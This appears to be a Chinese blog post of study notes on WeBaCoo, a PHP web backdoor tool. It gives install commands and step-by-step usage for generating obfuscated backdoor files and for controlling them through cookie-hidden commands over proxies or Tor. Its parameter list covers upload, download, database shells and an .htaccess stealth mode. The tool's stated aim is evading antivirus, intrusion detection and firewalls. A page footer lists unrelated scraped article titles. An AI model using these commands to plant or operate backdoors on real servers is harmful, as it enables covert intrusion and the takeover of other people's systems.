PHP WeBaCoo后门学习笔记
PHP WeBaCoo后门学习笔记 - PHP WeBaCoo backdoor learning notes
WeBaCoo (Web Backdoor Cookie) 是一款隐蔽的脚本类Web后门工具。设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测)。WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。
安装:
官网:http://sbechtsoudis.com/archiive/webacoo/index.html
kali linux下默认位于:/usr/bin 目录下
使用git安装:git clone git://github.com/anestisb/WeBaCoo.git
常见使用方法:
生成模式(后门生成):
1、使用默认配置生成模糊后门代码:
webacoo -g -o backdoor.php #backdoor.php为自定义后门文件名
2、使用exec有效载荷生成混淆后门代码:
webacoo -g -o backdoor.php -f 3 #backdoor.php为自定义后门文件名 3表示exec方法
3、使用popen有效载荷生成原始后门代码:
webacoo -g -o backdoor.php -f 5 -r #backdoor为自定义后门文件名 5表示popen方法
终端模式(后门利用):
1、使用默认配置访问服务器:
webacoo -t -u http://xxx/backdoor.php #-u 后门路径
2、使用“Cookie-name”作为Cookie名称、“TtT”作为分隔符访问服务器:
webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" #Cookie-name 与 TtT 为自定义内容
3、使用一般代理:
webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p XX.XX.XX.XX:XXXX #Cookie-name 与 TtT 为自定义内容 XX替换为相应的ip和端口号
4,使用tor代理:
webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p tor #Cookie-name 与 TtT 为自定义内容
参数解释:
-f FUNCTION :使用PHP系统函数 system、shell_exec、exec、passthru、popen ,按顺序FUNCTION分别为数字1、2、3、4、5
-g:生成后门
-o:指定生成的后门文件名
-u URL:后门路径
-e CMD:单独命令执行模式 需要添加 -t 和 -u参数
-m METHOD:选择HTTP请求方式,默认为GET
-c COOKIE:Cookie的名字,默认为:M-cookie
-d DELIM:指定分隔符 默认为随机
-p PROXY:使用代理
-v LEVEL:打印的详细程度。默认0 无附加信息,1打印HTTP头,2打印HTTP头和数据
-h:显示帮助文件并退出
-update:更新
mysql-cli:MySQL命令行模式
psql-cli:Postgres命令行模式
upload 使用POST上传文件
download:下载文件
stealth:通过.htaccess 处理增加的隐形模块
PHP WeBaCoo后门学习笔记相关推荐
- 信息安全学习笔记(四)------网络后门与网络隐身
信息安全学习笔记(四)------网络后门与网络隐身 前言: 本节主要介绍木马,后门和清楚攻击痕迹等,这些技术和方法都是黑客攻击常用的技术. 一.木马 概述:比喻埋伏在别人计算机里,偷取对方机密文件的 ...
- UVM学习笔记—前门访问/后门访问
目录 0.前言 1.前门访问 2.后门访问 2.1路径设置 2.2操作类型 0.前言 在UVM学习笔记-寄存器模型的搭建及使用中提到过前门访问和后门访问的概念,这篇文章将会详细的阐述一下这2种访问方式 ...
- Windows x64内核学习笔记(五)—— KPTI(未完待续)
Windows x64内核学习笔记(五)-- KPTI(未完待续) KPTI 实验一:构造IDT后门并读取Cr3 参考资料 KPTI 描述:KPTI(Kernel page-table isolati ...
- Windows x64内核学习笔记(三)—— SMEP SMAP
Windows x64内核学习笔记(三)-- SMEP & SMAP SMEP & SMAP 实验:构造IDT后门 第一步:编译以下代码 第二步:构造IDT后门 第三步:运行程序 第四 ...
- Windows x64内核学习笔记(一)—— 环境与配置
Windows x64内核学习笔记(一)-- 环境与配置 前言 新特性 基础要求 实验环境 Guest Win10配置 问题解决 参考资料 前言 之前,跟着海哥学习了windows内核的一些机制,包括 ...
- 《安全测试指南》——信息收集测试【学习笔记】
[信息收集测试] 1.搜索引擎信息收集(OTG-INFO-001) 通过搜索引擎收集以下: · 网络拓扑图和配置 · 管理员和其他员工的归档文章和邮件 · 登录过程和用户名的格式 · 用户名和密码 · ...
- 我的Android进阶之旅------gt;Android中编解码学习笔记
编解码学习笔记(一):基本概念 媒体业务是网络的主要业务之间.尤其移动互联网业务的兴起,在运营商和应用开发商中,媒体业务份量极重,其中媒体的编解码服务涉及需求分析.应用开发.释放license收费等等 ...
- 关于《Python绝技:运用Python成为顶级黑客》的学习笔记
本篇文章主要把<Python绝技:运用Python成为顶级黑客>中的代码敲一遍,学学Python安全相关的编程与思路,然后根据具体的情况修改一下代码. 第一章--入门 1.准备开发环境 安 ...
- 2021小迪网络安全渗透培训—学习笔记打卡
P1-基础知识 域名 一级域名:www.xxxx.com 二级域名:aaa.xxxx.com 多级域名:bbb.aaa.xxxx.com DNS 解析域名可通过cmd ping一下域名可获得解析的ip ...
最新文章
- 基于可靠消息方案的分布式事务(四):接入Lottor服务
- 1.httpClient和ScrollView
- Backbone Model——数据模型
- python学习笔记(二)列表(List)操作方法详解
- 计算机毕业设计制作模仿网站的期末作业通过神器——各种扒站方法(网站,软件)
- 【渝粤教育】国家开放大学2018年春季 0283-21T广告创意与表现(二) 参考试题
- 【Nginx那些事】nginx原理解析
- MySql 8 命令
- WebGL难以置信的神奇效果
- matlab样本标准差,关于样本标准差(SD)与样本标准误差(SE)
- spring5学习笔记
- 数据增强——mixup
- 【C#】ADO.NET 实体数据模型 warning CS1591:
- 基于MODBUS通讯协议的酒厂温湿度、光照度数据采集系统的设计与实现
- winvnc源码阅读笔记(四)---------vncDesktopThread线程
- 二分匹配Hopcroft-Carp算法
- myaql数据库如何建表
- Mobius函数(模板)
- 根据ip或者自动识别当前用户所在国家、地区、城市
- 【笔记】微信小程序基础
热门文章
- 38动感菜单 38 jQuery And CSS Drop Down Multi Level Menu Solutions
- 用mycat做读写分离:基于 MySQL主从复制
- centos7 安装MyCli MySQL 客户端
- 数据清洗-拉格朗日插值
- Java—Java 8 新增特性详解(Predicate和Stream)
- 华科10年保送生计算机考研复试机试
- 设置让终端保持utf8 cmd的设置
- excel字体颜色对照表 取值0-63
- git-分支管理策略-合并分支时创建新的版本
- linux-目录查询命令-目录内容查看-ls查询-tree查询-查询类容分类-不同颜色对应不同类型